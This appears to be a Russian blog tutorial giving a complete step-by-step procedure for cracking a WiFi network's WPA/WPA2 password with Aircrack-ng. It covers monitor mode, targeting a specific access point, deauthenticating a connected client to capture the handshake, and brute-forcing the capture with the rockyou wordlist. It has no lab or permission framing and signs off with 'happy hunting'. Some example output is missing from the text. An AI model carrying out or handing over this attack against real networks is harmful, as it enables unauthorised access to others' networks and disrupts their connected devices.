Принцип взлома заключается в перехвате рукопожатия (зашифрованного методом WPA/WPA2-PSK) во время прохождения аутентификации клиента на WiFi роутере и дальнейшем подборе пароля по словарю. Для подобного рода взлома потребуется WiFi адаптер с возможностью работать в режиме мониторинга, а так же компьютер или виртуальная машина с ОС Linux и набор утилит из пакета Aircrack-ng. Из самых распространенных и не дорогих можно посоветовать адаптеры на чипах Atheros AR9271 и Ralink RT3070, которые можно приобрести на aliexpress.
И так начнем. Для начала установим Aircrack-ng. Так как я использую Linux Ubuntu, то команда инсталляции будет следующей:
sudo apt install aircrack-ng
Переводим адаптер в режим мониторинга. Это можно проделать двумя способами - системными утилитами ip, iw или утилитой airmon-ng из пакета Aircrack-ng. Рассмотрим первый способ. Для этого нужно ввести несколько команд. Подключаем наш адаптер и смотрим его название и режим:
iw dev
Вывод консоли будет примерно следующим:
Затем его нужно выключить командой:
sudo ip link set wlan0 down
Далее переключаем адаптер в режим мониторинга:
sudo iw dev wlan0 set type monitor
И обратно включаем его:
sudo ip link set wlan0 up
где wlan0 - название вашего WiFi адаптера. Еще раз смотрим режим адаптера той же командой:
iw dev
Теперь ваш адаптер в режиме мониторинга. Рассмотрим второй способ переключения режима. Это делается двумя командами. Сначала прибиваем мешающие процессы:
sudo airmon-ng check kill
Затем переводим в режим мониторинга:
sudo airmon-ng start wlan0
Вот и все :) Далее нам нужно посмотреть доступные точки доступа. Для этого воспользуемся командой:
sudo airodump-ng wlan0
Вывод будет примерно следующим:
Теперь выбираем WiFi точку, которую будем взламывать, копируем BSSID этой точки и запускаем мониторинг.
sudo airodump-ng --bssid 90:72:40:11:A0:CA -c 11 -w ./wificarck/semeyaka wlan0
где
-c 11 это номер канала радиоточки
-w ./wificarck/semeyaka это префикс файлов, куда будут сохраняться данные перехвата
Результат команды будет примерно такой:
Параллельно в соседнем терминале запускаем перехват WPA/WPA2 рукопожатия, делается это командой:
sudo aireplay-ng -a 90:72:40:11:A0:CA -c C6:F6:C5:E9:C3:97 -0 50 wlan0
где
-a 90:72:40:11:A0:CA это BSSID точки доступа
-c C6:F6:C5:E9:C3:97 это MAC адрес клиента подключенного к этой точке
-0 50 это количество попыток деаутентификации
Вывод будет примерно следующим:
При успешном перехвате рукопожатия выводится сообщение:
WPA handshake: BSSID
В результате у нас сохраняются файлы перехвата:
Нас интересует файл semeyaka-N.cap, в нем содержится зашифрованный пароль от точки доступа. Для подбора этого пароля необходимы файлы со словарями, их можно скачать отсюда https://github.com/danielmiessler/SecLists/tree/master/Passwords
Теперь все готово для перебора паролей, для этого запускаем команду:
aircrack-ng -b 90:72:40:11:A0:CA -w ./passwords/rockyou.txt ./semeyaka-01.cap
где
-b 90:72:40:11:A0:CA это BSSID точки доступа
-w ./passwords/rockyou.txt путь к словарю с паролями
./semeyaka-03.cap файл с перехваченным рукопожатием
Процесс перебора будет примерно такой:
Если пароль подобран, то утилита сообщит об этом сообщением вида:
KEY FOUND! [ 987654321 ]
На этом все. Удачной охоты :)
Комментариев нет:
Отправить комментарий